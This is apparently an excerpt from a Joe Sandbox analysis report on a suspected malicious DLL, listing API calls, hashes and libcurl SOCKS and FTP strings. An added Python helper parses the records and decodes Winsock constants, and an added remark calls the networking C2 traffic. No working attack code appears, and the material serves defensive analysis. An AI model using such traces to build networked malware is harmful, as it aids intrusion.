                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateErrorLastThread__dosmaperr
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2744730728-0
                                                                                                                            • Opcode ID: cb1c2a65bb690c2852bc6fcb33557736ebc7b5ee01a47790e36c1377a1c1566e
                                                                                                                            • Instruction ID: cd7e61a9c2ddc8395a91efc6d5fc96cf6c9aac73c00bc716d5f6bcb9b5e2405d
                                                                                                                            • Opcode Fuzzy Hash: cb1c2a65bb690c2852bc6fcb33557736ebc7b5ee01a47790e36c1377a1c1566e
                                                                                                                            • Instruction Fuzzy Hash: B0017172519219EFDF058FB1CE0AA9F7BA8EF05368F084169F81196150DB78DA10DBB0
                                                                                                                            APIs
                                                                                                                            • SleepEx.KERNEL32(00000000,00000000), ref: 6B6C4758
                                                                                                                            • getsockopt.WS2_32(00000004,0000FFFF,00001007,00000000,00000004), ref: 6B6C4773
                                                                                                                            • WSAGetLastError.WS2_32 ref: 6B6C477D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                             • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                             • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                             • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                             • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLastSleepgetsockopt
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3033474312-0
                                                                                                                            • Opcode ID: 981614887e6f4e3990a0934c32735697c2cac64b467a01e1bb88bd669affa606
                                                                                                                            • Instruction ID: 1a04d7915d622916ff959933d586207f485dcb38849459008142b878a37478ad
                                                                                                                            • Opcode Fuzzy Hash: 981614887e6f4e3990a0934c32735697c2cac64b467a01e1bb88bd669affa606
                                                                                                                            • Instruction Fuzzy Hash: 79F062B4640209EBEF10CFA1C8457AF7BBCEB02701F3040A5E9149A280D7B9E6059B62
                                                                                                                            APIs
                                                                                                                            • InitializeCriticalSectionEx.KERNEL32(00000000,00000000,00000001,?,?,00000000,00000048), ref: 6B6C115D
                                                                                                                            Strings
                                                                                                                            • getaddrinfo() thread failed to start, xrefs: 6B6C11AA
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                             • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                             • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                             • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                             • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalInitializeSection
                                                                                                                            • String ID: getaddrinfo() thread failed to start
                                                                                                                            • API String ID: 32694325-737161664
                                                                                                                            • Opcode ID: d7c0f14cf1dcaa2895762afdd043dbba35dc4c173aad8b0f5260942afae8b6a4
                                                                                                                            • Instruction ID: d5907aff6c7e7cad9d9b896a3c74404a97b10d48d0623e5cbe7b3ff73e920cc7
                                                                                                                            • Opcode Fuzzy Hash: d7c0f14cf1dcaa2895762afdd043dbba35dc4c173aad8b0f5260942afae8b6a4
                                                                                                                            • Instruction Fuzzy Hash: D25102B0D00216EBEB009F64DD4578A7BB4FF05305F048275ED08AF291EB79E5A4CBA2
                                                                                                                            APIs
                                                                                                                            • ioctlsocket.WS2_32(00000000,8004667E,TElk), ref: 6B6EA67A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                             • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                             • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                             • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                             • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ioctlsocket
                                                                                                                            • String ID: TElk
                                                                                                                            • API String ID: 3577187118-5412025
                                                                                                                            • Opcode ID: 777a9e0a120773bd9c12984bca9776edbeec28584b1393350a1fcef7df128116
                                                                                                                            • Instruction ID: 279cae252922e87f3b8a67348f99b97c5e077ee9ae74560c35b77968098e0aae
                                                                                                                            • Opcode Fuzzy Hash: 777a9e0a120773bd9c12984bca9776edbeec28584b1393350a1fcef7df128116
                                                                                                                            • Instruction Fuzzy Hash: 6ED0EA7240120CEFCB019EB1D8059DA7BADEA08225B01C43AB9299A121EB35EA65DF95
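The raw hex arguments in the API records above carry more meaning than the report spells out: getsockopt(…, 0000FFFF, 00001007, …) after SleepEx is getsockopt(SOL_SOCKET, SO_ERROR), the completion check on a non-blocking connect; ioctlsocket(…, 8004667E, …) is FIONBIO, switching the socket to non-blocking mode; and WSASetLastError(00002AF9) sets WSAHOST_NOT_FOUND (11001) in the getaddrinfo wrapper. Together with the curl_easy_init record and the "getaddrinfo() thread failed to start" string, that is consistent with a statically linked libcurl doing the C2 networking, though the page itself does not state this. The following is an added helper, not part of the Joe Sandbox report or the sample, that parses these "APIs" bullet lines into structured records and decodes the Winsock constants an analyst would otherwise look up by hand; the sample text is constructed from the lines on this page, and the constant table holds only documented Winsock values.

```python
"""Parse Joe Sandbox 'APIs' bullet lines and decode Winsock constants.

Added example for triaging report records like:
    • getsockopt.WS2_32(00000004,0000FFFF,00001007,00000000,00000004), ref: 6B6C4773
Constants are documented winsock2.h / WinError values; everything else is
reported as raw hex so nothing is guessed.
"""
import re
from dataclasses import dataclass, field

# Documented Winsock values (winsock2.h / WinError.h).
SOL_SOCKET = 0xFFFF
SO_ERROR = 0x1007
FIONBIO = 0x8004667E
WSA_ERRORS = {
    0x2733: "WSAEWOULDBLOCK",     # 10035
    0x274C: "WSAETIMEDOUT",       # 10060
    0x2AF9: "WSAHOST_NOT_FOUND",  # 11001
}

# One bullet line: "• <api>.<module>(<args>), ref: <hex addr>"; the (args)
# part is optional (e.g. "• WSAGetLastError.WS2_32 ref: 6B6C477D").
API_RE = re.compile(
    r"^\s*•\s*(?P<api>[\w@$?]+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)


@dataclass
class ApiCall:
    api: str
    module: str
    ref: int                                   # call-site address
    args: list = field(default_factory=list)   # int for hex, str otherwise
    notes: list = field(default_factory=list)  # decoded meaning, if known


def parse_arg(tok):
    """8-digit hex becomes int; '?' (unknown) or inline strings stay as text."""
    tok = tok.strip()
    if re.fullmatch(r"[0-9A-Fa-f]{8}", tok):
        return int(tok, 16)
    return tok


def annotate(call):
    """Attach a note only where the argument values are unambiguous."""
    a = call.args
    if call.api == "getsockopt" and len(a) >= 3 and a[1] == SOL_SOCKET and a[2] == SO_ERROR:
        call.notes.append("getsockopt(SOL_SOCKET, SO_ERROR): completion check on a non-blocking connect")
    elif call.api == "ioctlsocket" and len(a) >= 2 and a[1] == FIONBIO:
        call.notes.append("ioctlsocket(FIONBIO): socket switched to non-blocking mode")
    elif call.api == "WSASetLastError" and a and isinstance(a[0], int) and a[0] in WSA_ERRORS:
        call.notes.append(f"WSASetLastError({WSA_ERRORS[a[0]]}, {a[0]})")
    return call


def parse_api_line(line):
    """Return an ApiCall for one bullet line, or None for any other line."""
    m = API_RE.match(line)
    if not m:
        return None
    args = [parse_arg(t) for t in m["args"].split(",")] if m["args"] else []
    return annotate(ApiCall(m["api"], m["module"], int(m["ref"], 16), args))


def parse_report(text):
    """Parse every API bullet in a pasted report section; skip other lines."""
    return [c for c in (parse_api_line(l) for l in text.splitlines()) if c]


# Constructed sample: the API lines from the records on this page.
SAMPLE = """\
APIs
• SleepEx.KERNEL32(00000000,00000000), ref: 6B6C4758
• getsockopt.WS2_32(00000004,0000FFFF,00001007,00000000,00000004), ref: 6B6C4773
• WSAGetLastError.WS2_32 ref: 6B6C477D
• ioctlsocket.WS2_32(00000000,8004667E,TElk), ref: 6B6EA67A
• WSASetLastError.WS2_32(00002AF9,?,?,6B72B330,?), ref: 6B6C6F99
• __dosmaperr.LIBCMT ref: 6B7183BC
Memory Dump Source
"""

if __name__ == "__main__":
    for c in parse_report(SAMPLE):
        print(f"{c.ref:08X} {c.module}!{c.api}{c.args} {'; '.join(c.notes)}")
```

Paste the "APIs" lines of any record into SAMPLE (or feed a whole copied section to parse_report) to get the decoded calls; unknown values are left as hex on purpose so that the output never claims more than the report shows.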
                                                                                                                            APIs
                                                                                                                            • WSACloseEvent.WS2_32(50000000), ref: 6B6E7A66
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                             • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                             • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                             • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                             • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseEvent
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2624557715-0
                                                                                                                            • Opcode ID: 3f94b156909a17b129d85bdbadd28921d77b4c41217619fdb8ceb5482eb37a57
                                                                                                                            • Instruction ID: 596b34a400ba2a8053a04f5327cd3ac84727bacf5fb03c3bc136459c4800a429
                                                                                                                            • Opcode Fuzzy Hash: 3f94b156909a17b129d85bdbadd28921d77b4c41217619fdb8ceb5482eb37a57
                                                                                                                            • Instruction Fuzzy Hash: 1F2125B28066109BEB218F70DC85BAB7BECFF04318F0404A9EA185B186D77AE545C7B5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                             • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                             • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                             • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                             • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: curl_easy_init
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4195830768-0
                                                                                                                            • Opcode ID: 6835e8f418b762be03355f4502828c7c85d0bf8bb874fe3edcabbfc67356e05b
                                                                                                                            • Instruction ID: 70ddd35908b2cc42aa31a5223a20f0c134f9f04f7269c9453a9ab095f70fcdb6
                                                                                                                            • Opcode Fuzzy Hash: 6835e8f418b762be03355f4502828c7c85d0bf8bb874fe3edcabbfc67356e05b
                                                                                                                            • Instruction Fuzzy Hash: 65F0B4B33001146BD7005AA9AC80AEBF798FB80178B400177F90CC7601D76AE51146E6
                                                                                                                            APIs
                                                                                                                            • RtlAllocateHeap.NTDLL(00000008,00000364,00000000,?,6B71F6DD,00000001,00000364,00000015,000000FF), ref: 6B71F7CE
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                             • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                             • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                             • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                             • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateHeap
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1279760036-0
                                                                                                                            • Opcode ID: af2e8038ee0a37df2c0c973657565df9b8b4418a7d3a2d7186417e2f8c926c23
                                                                                                                            • Instruction ID: 9b960bd6782b4d3bfb54dba0ec9b74e7ca7c6a24ce8ce7ce35e8959f98cf90ac
                                                                                                                            • Opcode Fuzzy Hash: af2e8038ee0a37df2c0c973657565df9b8b4418a7d3a2d7186417e2f8c926c23
                                                                                                                            • Instruction Fuzzy Hash: 90F0B43264D52557EB116A769F45F4E7748BF82B71F994073F824AE980DB7CD80046B0
                                                                                                                            APIs
                                                                                                                            • socket.WS2_32(00000017,00000002,00000000), ref: 6B6D8A3D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: socket
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 98920635-0
                                                                                                                            • Opcode ID: ca6380a81f37ac30c7b45174390560f6c3f87d352932611ece0b3fcd15a21b82
                                                                                                                            • Instruction ID: 862a37d50e8fece41468c9ab4c59a603f00a3145c60c0ca5b08fe1a4ab7a2709
                                                                                                                            • Opcode Fuzzy Hash: ca6380a81f37ac30c7b45174390560f6c3f87d352932611ece0b3fcd15a21b82
                                                                                                                            • Instruction Fuzzy Hash: 32E086742843046AE9004AA8AC46FE537D84B05725F4452E1F52C9F6F1C761E841A661
                                                                                                                            APIs
                                                                                                                            • ___from_strstr_to_strchr.LIBCMT ref: 6B6CEFA1
                                                                                                                            • _strncpy.LIBCMT ref: 6B6CEFC7
                                                                                                                            • ___from_strstr_to_strchr.LIBCMT ref: 6B6CEFE8
                                                                                                                            • inet_pton.WS2_32(00000017,?,?), ref: 6B6CF006
                                                                                                                            • ___from_strstr_to_strchr.LIBCMT ref: 6B6CF078
                                                                                                                            • ___from_strstr_to_strchr.LIBCMT ref: 6B6CF0A9
                                                                                                                            • curl_pushheader_bynum.LIBCURL(?,00000000,00000401), ref: 6B6CF135
                                                                                                                            • getsockname.WS2_32(?,?,?), ref: 6B6CF1CC
                                                                                                                            • WSAGetLastError.WS2_32(?,00000100), ref: 6B6CF1E2
                                                                                                                            • WSAGetLastError.WS2_32 ref: 6B6CF2ED
                                                                                                                            • bind.WS2_32(FFFFFFFF,00000017,00000080), ref: 6B6CF396
                                                                                                                            • WSAGetLastError.WS2_32 ref: 6B6CF3A4
                                                                                                                            • getsockname.WS2_32(?,00000017,00000080), ref: 6B6CF407
                                                                                                                            • WSAGetLastError.WS2_32(?,00000100), ref: 6B6CF452
                                                                                                                              • Part of subcall function 6B6FA0E0: GetLastError.KERNEL32(?,?,00000100), ref: 6B6FA0E7
                                                                                                                              • Part of subcall function 6B6F05D0: curl_mvsnprintf.LIBCURL(?,00000100,6B6EC830,?), ref: 6B6F0610
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast$___from_strstr_to_strchr$getsockname$_strncpybindcurl_mvsnprintfcurl_pushheader_bynuminet_pton
                                                                                                                            • String ID: %s %s$%s |%d|%s|%hu|$,%d,%d$EPRT$Failure sending EPRT command: %s$Failure sending PORT command: %s$PORT$bind() failed, we ran out of ports!$bind(port=%hu) failed: %s$bind(port=%hu) on non-local address failed: %s$failed to resolve the address provided to PORT: %s$getsockname() failed: %s$socket failure: %s
                                                                                                                            • API String ID: 1437543408-2383553807
                                                                                                                            • Opcode ID: 1b45e6247f2ea19263b19b467038a5306abcc8995438a904f3c83bc1c0f1910b
                                                                                                                            • Instruction ID: e497d2d7e6369d43606155165a06c8afcfac8610740c287c0d06fe8494a88be3
                                                                                                                            • Opcode Fuzzy Hash: 1b45e6247f2ea19263b19b467038a5306abcc8995438a904f3c83bc1c0f1910b
                                                                                                                            • Instruction Fuzzy Hash: F732E6F1D441299BDB208F34CD45BEFB7BAEF45304F0441E6E818A3141DB3A9A958FA6
                                                                                                                            Strings
                                                                                                                            • SOCKS5 GSSAPI per-message authentication is not supported., xrefs: 6B6F7A2F
                                                                                                                            • SOCKS5 connect to IPv6 %s (locally resolved), xrefs: 6B6F7EB5
                                                                                                                            • SOCKS5 GSS-API protection not yet implemented., xrefs: 6B6F802E
                                                                                                                            • Unable to send initial SOCKS5 request., xrefs: 6B6F78B0
                                                                                                                            • Failed to resolve "%s" for SOCKS5 connect., xrefs: 6B6F7F06
                                                                                                                            • connection to proxy closed, xrefs: 6B6F821A
                                                                                                                            • Received invalid version in initial SOCKS5 response., xrefs: 6B6F7940
                                                                                                                            • Connection to proxy closed, xrefs: 6B6F790D
                                                                                                                            • SOCKS5 connection to %s not supported, xrefs: 6B6F7EDE
                                                                                                                            • Unable to receive initial SOCKS5 response., xrefs: 6B6F7861
                                                                                                                            • SOCKS5 reply has wrong version, version should be 5., xrefs: 6B6F80DE
                                                                                                                            • warning: unsupported value passed to CURLOPT_SOCKS5_AUTH: %lu, xrefs: 6B6F7737
                                                                                                                            • unknown, xrefs: 6B6F760C
                                                                                                                            • Can't complete SOCKS5 connection to %s. (%d), xrefs: 6B6F8118
                                                                                                                            • Unable to receive SOCKS5 sub-negotiation response., xrefs: 6B6F7C2C
                                                                                                                            • :%d, xrefs: 6B6F7D63
                                                                                                                            • Failed to send SOCKS5 sub-negotiation request., xrefs: 6B6F7BA7
                                                                                                                            • Excessive user name length for proxy auth, xrefs: 6B6F7AC3
                                                                                                                            • Excessive password length for proxy auth, xrefs: 6B6F7B23
                                                                                                                            • Undocumented SOCKS5 mode attempted to be used by server., xrefs: 6B6F7A7B
                                                                                                                            • SOCKS5 request granted., xrefs: 6B6F8259
                                                                                                                            • User was rejected by the SOCKS5 server (%d %d)., xrefs: 6B6F7C75
                                                                                                                            • SOCKS5: connecting to HTTP proxy %s port %d, xrefs: 6B6F76ED
                                                                                                                            • SOCKS5 connect to IPv4 %s (locally resolved), xrefs: 6B6F7DD3
                                                                                                                            • Failed to send SOCKS5 connect request., xrefs: 6B6F7FED
                                                                                                                            • SOCKS5 reply has wrong address type., xrefs: 6B6F81F2
                                                                                                                            • Unable to negotiate SOCKS5 GSS-API context., xrefs: 6B6F7A0B
                                                                                                                            • No authentication method was acceptable., xrefs: 6B6F7A57
                                                                                                                            • SOCKS5 connect to %s:%d (remotely resolved), xrefs: 6B6F7F70
                                                                                                                            • SOCKS5: server resolving disabled for hostnames of length > 255 [actual len=%zu], xrefs: 6B6F7712
                                                                                                                            • Failed to receive SOCKS5 connect request ack., xrefs: 6B6F809F, 6B6F81CE
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: curl_mvsnprintf$curl_msnprintf
                                                                                                                            • String ID: :%d$Can't complete SOCKS5 connection to %s. (%d)$Connection to proxy closed$Excessive password length for proxy auth$Excessive user name length for proxy auth$Failed to receive SOCKS5 connect request ack.$Failed to resolve "%s" for SOCKS5 connect.$Failed to send SOCKS5 connect request.$Failed to send SOCKS5 sub-negotiation request.$No authentication method was acceptable.$Received invalid version in initial SOCKS5 response.$SOCKS5 GSS-API protection not yet implemented.$SOCKS5 GSSAPI per-message authentication is not supported.$SOCKS5 connect to %s:%d (remotely resolved)$SOCKS5 connect to IPv4 %s (locally resolved)$SOCKS5 connect to IPv6 %s (locally resolved)$SOCKS5 connection to %s not supported$SOCKS5 reply has wrong address type.$SOCKS5 reply has wrong version, version should be 5.$SOCKS5 request granted.$SOCKS5: connecting to HTTP proxy %s port %d$SOCKS5: server resolving disabled for hostnames of length > 255 [actual len=%zu]$Unable to negotiate SOCKS5 GSS-API context.$Unable to receive SOCKS5 sub-negotiation response.$Unable to receive initial SOCKS5 response.$Unable to send initial SOCKS5 request.$Undocumented SOCKS5 mode attempted to be used by server.$User was rejected by the SOCKS5 server (%d %d).$connection to proxy closed$unknown$warning: unsupported value passed to CURLOPT_SOCKS5_AUTH: %lu
                                                                                                                            • API String ID: 2260702874-704893380
                                                                                                                            • Opcode ID: 0851273c1541cd4f14c99f572d6e0348699a05097cadfa74c9acab4f8c678770
                                                                                                                            • Instruction ID: 5bcd9b2f627002fd029f5d6b3e9b39333978a6e68e534618973b2db79b604ce2
                                                                                                                            • Opcode Fuzzy Hash: 0851273c1541cd4f14c99f572d6e0348699a05097cadfa74c9acab4f8c678770
                                                                                                                            • Instruction Fuzzy Hash: 79621CB1A042189BDB11CF28DD817FEB7BAEF45304F0040EEE85D97241DB3A9A56CB61
                                                                                                                            APIs
                                                                                                                            • curl_pushheader_bynum.LIBCURL(?,?,?,?,?,00000100,?,?,?,?,?,?,?,?,?,?), ref: 6B6C3AC2
                                                                                                                            • inet_pton.WS2_32(00000017,?,?), ref: 6B6C3BA2
                                                                                                                            • htons.WS2_32(?), ref: 6B6C3BB9
                                                                                                                            • inet_pton.WS2_32(00000002,?,?), ref: 6B6C3CED
                                                                                                                            • htons.WS2_32(?), ref: 6B6C3D08
                                                                                                                              • Part of subcall function 6B6F06B0: curl_mvsnprintf.LIBCURL(?,00000801,00000000,$lnk), ref: 6B6F06EF
                                                                                                                              • Part of subcall function 6B6F06B0: curl_msnprintf.LIBCURL(?,00000004,...,?,?,?,00000E20), ref: 6B6F072F
                                                                                                                            • bind.WS2_32(?,?,00000000), ref: 6B6C3DAF
                                                                                                                            • htons.WS2_32(?), ref: 6B6C3DE9
                                                                                                                            • bind.WS2_32(?,?,00000000), ref: 6B6C3E02
                                                                                                                            • getsockname.WS2_32(?,?,00000080), ref: 6B6C3E3D
                                                                                                                            • WSAGetLastError.WS2_32 ref: 6B6C3E4B
                                                                                                                            • WSAGetLastError.WS2_32 ref: 6B6C3E91
                                                                                                                            Strings
                                                                                                                            • Name '%s' family %i resolved to '%s' family %i, xrefs: 6B6C3C90
                                                                                                                            • Couldn't bind to interface '%s', xrefs: 6B6C3BE4
                                                                                                                            • Bind to local port %hu failed, trying next, xrefs: 6B6C3DD9
                                                                                                                            • Local Interface %s is ip %s using address family %i, xrefs: 6B6C3B78
                                                                                                                            • bind failed with errno %d: %s, xrefs: 6B6C3EB3
                                                                                                                            • Local port: %hu, xrefs: 6B6C3EDB
                                                                                                                            • getsockname() failed with errno %d: %s, xrefs: 6B6C3E6D
                                                                                                                            • Couldn't bind to '%s', xrefs: 6B6C3D26
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: htons$ErrorLastbindinet_pton$curl_msnprintfcurl_mvsnprintfcurl_pushheader_bynumgetsockname
                                                                                                                            • String ID: Bind to local port %hu failed, trying next$Couldn't bind to '%s'$Couldn't bind to interface '%s'$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$getsockname() failed with errno %d: %s
                                                                                                                            • API String ID: 2165106075-2769131373
                                                                                                                            • Opcode ID: 12a3e8f1ad1751b7cab029b7c2e9e8b92530792cad9b6f586087a5ba117c7658
                                                                                                                            • Instruction ID: e794cad269dd7a117160360431eada0313b59a455868a1be38a47efcfdc64174
                                                                                                                            • Opcode Fuzzy Hash: 12a3e8f1ad1751b7cab029b7c2e9e8b92530792cad9b6f586087a5ba117c7658
                                                                                                                            • Instruction Fuzzy Hash: 0EE1B3B5A012199BDB20DF64DD89BEA77B8EF05304F0040EAF90DD7241EB39AE458F61
                                                                                                                            Strings
                                                                                                                            • Failed to resolve "%s" for SOCKS4 connect., xrefs: 6B6F71FD
                                                                                                                            • SOCKS4 connect to IPv4 %s (locally resolved), xrefs: 6B6F7188
                                                                                                                            • Too long SOCKS proxy user name, can't use!, xrefs: 6B6F70C9
                                                                                                                            • SOCKS4 non-blocking resolve of %s, xrefs: 6B6F7064
                                                                                                                            • Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), Unknown., xrefs: 6B6F756A
                                                                                                                            • connection to proxy closed, xrefs: 6B6F73BA
                                                                                                                            • SOCKS4: too long host name, xrefs: 6B6F72F5
                                                                                                                            • Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected or failed., xrefs: 6B6F7495
                                                                                                                            • SOCKS4: Failed receiving connect request ack: %s, xrefs: 6B6F7392
                                                                                                                            • SOCKS4 connection to %s not supported, xrefs: 6B6F71D6
                                                                                                                            • SOCKS4 reply has wrong version, version should be 0., xrefs: 6B6F7403
                                                                                                                            • Hostname '%s' was found, xrefs: 6B6F7113
                                                                                                                            • Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because SOCKS server cannot connect to identd on the client., xrefs: 6B6F74DC
                                                                                                                            • SOCKS4%s: connecting to HTTP proxy %s port %d, xrefs: 6B6F6FF6
                                                                                                                            • Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because the client program and identd report different user-ids., xrefs: 6B6F7523
                                                                                                                            • Failed to send SOCKS4 connect request., xrefs: 6B6F72D1
                                                                                                                            • SOCKS4%s request granted., xrefs: 6B6F744B
